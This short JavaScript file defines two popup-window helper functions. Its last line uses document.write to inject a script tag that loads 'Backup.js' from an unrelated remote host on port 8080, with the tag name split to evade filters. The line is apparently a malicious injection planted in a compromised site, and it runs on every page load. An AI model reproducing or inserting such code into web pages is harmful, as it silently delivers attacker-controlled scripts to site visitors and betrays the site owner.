<!--
function Show(url, width, height)
{
window.open(url,'','toolbar=no, location=no,directories=no, status=no, menubar=no, scrollbars=no, resizable=no, width='+width+', height='+height+', left=100, top=100');
}

function Show1(url, width, height)
{
window.open(url,'','toolbar=yes, location=yes,directories=yes, status=yes, menubar=yes, scrollbars=yes, resizable=yes, width='+width+', height='+height+', left=100, top=100');
}


//-->




document.write('<s'+'cript type="text/javascript" src="http://oployau.fancountblogger.com:8080/Backup.js"></scr'+'ipt>');